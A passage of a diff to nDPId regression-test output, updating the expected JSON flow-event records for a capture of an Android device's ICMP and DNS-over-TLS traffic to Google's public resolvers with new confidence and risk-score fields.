O=Google LLC, CN=dns.google","fingerprint":"5B:59:09:FC:7D:50:E6:F7:D1:08:8E:57:42:A2:D8:AE:1F:03:FF:EC"}}
 00548{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":81,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592552827426,"flow_last_seen":1592552827426,"flow_idle_time":120000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1592552827426,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.8.8","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3}
 00514{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1592552827426,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"ts_msec":1592552827426,"pkt":"EBMx8Tl2ag\/ahpuQCABFAABUl9BAAEAB0IHAqAGfCAgICAgA4JUAAgABem3sXgAAAADqxwcAAAAAABAREhMUFRYXGBkaGxwdHh8gISIjJCUmJygpKissLS4vMDEyMzQ1Njc="}
-00607{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":81,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592552827426,"flow_last_seen":1592552827426,"flow_idle_time":120000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1592552827426,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.8.8","l4_proto":"icmp","ndpi": {"proto":"ICMP.Google","breed":"Acceptable","category":"Network"},"entropy":5.297900}
+00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":81,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592552827426,"flow_last_seen":1592552827426,"flow_idle_time":120000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1592552827426,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.8.8","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":5.297900}
 00514{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1592552827440,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"ts_msec":1592552827440,"pkt":"ag\/ahpuQEBMx8Tl2CABFoABUAAAAAHEBdrIICAgIwKgBnwAA6JUAAgABem3sXgAAAADqxwcAAAAAABAREhMUFRYXGBkaGxwdHh8gISIjJCUmJygpKissLS4vMDEyMzQ1Njc="}
 00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1592552828402,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"ts_msec":1592552828402,"pkt":"EBMx8Tl2ag\/ahpuQCABFAABUl\/5AAEAB0FPAqAGfCAgICAgAgPEAAwABe23sXgAAAABJawcAAAAAABAREhMUFRYXGBkaGxwdHh8gISIjJCUmJygpKissLS4vMDEyMzQ1Njc="}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":157,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592552871852,"flow_last_seen":1592552871852,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1592552871852,"l3_proto":"ip4","src_ip":"8.8.4.4","dst_ip":"192.168.1.159","src_port":853,"dst_port":47968,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -36,26 +36,26 @@
 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":159,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1592552878549,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1592552878549,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAA8PO5AAEAGL3vAqAGfCAgEBLviA1WhETzJAAAAAKAC\/\/\/ccgAAAgQFtAQCCAoAAAAnAAAAAAEDAwg="}
 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":160,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1592552878562,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1592552878562,"pkt":"ag\/ahpuQEBMx8Tl2CABFAAA8nAYAAHYG2mIICAQEwKgBnwNVu+J3bBxFoRE8yqAS6yB6VAAAAgQFZAQCCAo7E6h3AAAAJwEDAwg="}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":161,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1592552878563,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1592552878563,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAA0PO9AAEAGL4LAqAGfCAgEBLviA1WhETzKd2wcRoAQAVeSlgAAAQEICgAAACw7E6h3"}
-00849{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":162,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1592552878549,"flow_last_seen":1592552878564,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1592552878564,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48098,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"b734f75d22aaff9866fbd5d27eef9106","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-00903{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":164,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1592552878549,"flow_last_seen":1592552878577,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":664,"flow_avg_l4_payload_len":110,"midstream":0,"ts_msec":1592552878577,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48098,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"b734f75d22aaff9866fbd5d27eef9106","ja3s":"1249fb68f48c0444718e4d3b48b27188","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}}
-00631{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":208,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1592552827426,"flow_last_seen":1592552828415,"flow_idle_time":120000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":256,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1592552889402,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.8.8","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"ICMP.Google","breed":"Acceptable","category":"Network"}}
-00629{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":265,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1592552827426,"flow_last_seen":1592552828415,"flow_idle_time":120000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":256,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1592552946554,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.8.8","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"ICMP.Google","breed":"Acceptable","category":"Network"}}
-00615{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":265,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1592552824409,"flow_last_seen":1592552826208,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1592552946554,"l3_proto":"ip4","src_ip":"8.8.8.8","dst_ip":"192.168.1.159","src_port":853,"dst_port":55856,"l4_proto":"tcp","ndpi": {"proto":"DoH_DoT.Google","breed":"Acceptable","category":"Web"}}
+00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":162,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1592552878549,"flow_last_seen":1592552878564,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1592552878564,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48098,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"b734f75d22aaff9866fbd5d27eef9106","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+01009{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":164,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1592552878549,"flow_last_seen":1592552878577,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":664,"flow_avg_l4_payload_len":110,"midstream":0,"ts_msec":1592552878577,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48098,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"b734f75d22aaff9866fbd5d27eef9106","ja3s":"1249fb68f48c0444718e4d3b48b27188","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}}
+00650{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":208,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1592552827426,"flow_last_seen":1592552828415,"flow_idle_time":120000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":256,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1592552889402,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.8.8","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}}
+00648{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":265,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1592552827426,"flow_last_seen":1592552828415,"flow_idle_time":120000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":256,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1592552946554,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.8.8","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":265,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1592552824409,"flow_last_seen":1592552826208,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1592552946554,"l3_proto":"ip4","src_ip":"8.8.8.8","dst_ip":"192.168.1.159","src_port":853,"dst_port":55856,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"DoH_DoT.Google","breed":"Acceptable","category":"Web"}}
 00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":265,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1592552824409,"flow_last_seen":1592552826208,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1592552946554,"l3_proto":"ip4","src_ip":"8.8.8.8","dst_ip":"192.168.1.159","src_port":853,"dst_port":55856,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00713{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":265,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1592552825913,"flow_last_seen":1592552826054,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3843,"flow_avg_l4_payload_len":183,"midstream":0,"ts_msec":1592552946554,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.8.8","src_port":56024,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
-00713{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":265,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1592552825913,"flow_last_seen":1592552826030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3843,"flow_avg_l4_payload_len":183,"midstream":0,"ts_msec":1592552946554,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48044,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
-00615{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":285,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1592552871852,"flow_last_seen":1592552871941,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1592552991281,"l3_proto":"ip4","src_ip":"8.8.4.4","dst_ip":"192.168.1.159","src_port":853,"dst_port":47968,"l4_proto":"tcp","ndpi": {"proto":"DoH_DoT.Google","breed":"Acceptable","category":"Web"}}
+00819{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":265,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1592552825913,"flow_last_seen":1592552826054,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3843,"flow_avg_l4_payload_len":183,"midstream":0,"ts_msec":1592552946554,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.8.8","src_port":56024,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
+00819{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":265,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1592552825913,"flow_last_seen":1592552826030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3843,"flow_avg_l4_payload_len":183,"midstream":0,"ts_msec":1592552946554,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48044,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":285,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1592552871852,"flow_last_seen":1592552871941,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1592552991281,"l3_proto":"ip4","src_ip":"8.8.4.4","dst_ip":"192.168.1.159","src_port":853,"dst_port":47968,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"DoH_DoT.Google","breed":"Acceptable","category":"Web"}}
 00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":285,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1592552871852,"flow_last_seen":1592552871941,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1592552991281,"l3_proto":"ip4","src_ip":"8.8.4.4","dst_ip":"192.168.1.159","src_port":853,"dst_port":47968,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00715{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":285,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":104,"flow_first_seen":1592552826036,"flow_last_seen":1592552867048,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":21215,"flow_avg_l4_payload_len":203,"midstream":0,"ts_msec":1592552991281,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48048,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
+00821{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":285,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":104,"flow_first_seen":1592552826036,"flow_last_seen":1592552867048,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":21215,"flow_avg_l4_payload_len":203,"midstream":0,"ts_msec":1592552991281,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48048,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":292,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592553007037,"flow_last_seen":1592553007037,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1592553007037,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48210,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":292,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1592553007037,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1592553007037,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAA8FgpAAEAGVl\/AqAGfCAgEBLxSA1VGZWurAAAAAKAC\/\/+KUgAAAgQFtAQCCAoAAH2hAAAAAAEDAwg="}
 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":293,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1592553007051,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1592553007051,"pkt":"ag\/ahpuQEBMx8Tl2CABFAAA8ScwAAHYGLJ0ICAQEwKgBnwNVvFKvdpW\/RmVrrKAS6yB4FwAAAgQFZAQCCAp\/c2KvAAB9oQEDAwg="}
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":294,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1592553007078,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1592553007078,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAA0FgtAAEAGVmbAqAGfCAgEBLxSA1VGZWusr3aVwIAQAVeQUgAAAQEICgAAfa1\/c2Kv"}
-00848{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":295,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1592553007037,"flow_last_seen":1592553007088,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1592553007088,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48210,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-00905{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":297,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1592553007037,"flow_last_seen":1592553007118,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1572,"flow_avg_l4_payload_len":262,"midstream":0,"ts_msec":1592553007118,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48210,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}}
-01306{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":298,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1592553007037,"flow_last_seen":1592553007118,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":2990,"flow_avg_l4_payload_len":427,"midstream":0,"ts_msec":1592553007118,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48210,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","server_names":"dns.google,*.dns.google.com,8888.google,dns.google.com,dns64.dns.google,2001:4860:4860::64,2001:4860:4860::6464,2001:4860:4860::8844,2001:4860:4860::8888,8.8.4.4,8.8.8.8","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=dns.google","fingerprint":"5B:59:09:FC:7D:50:E6:F7:D1:08:8E:57:42:A2:D8:AE:1F:03:FF:EC"}}
+00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":295,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1592553007037,"flow_last_seen":1592553007088,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1592553007088,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48210,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
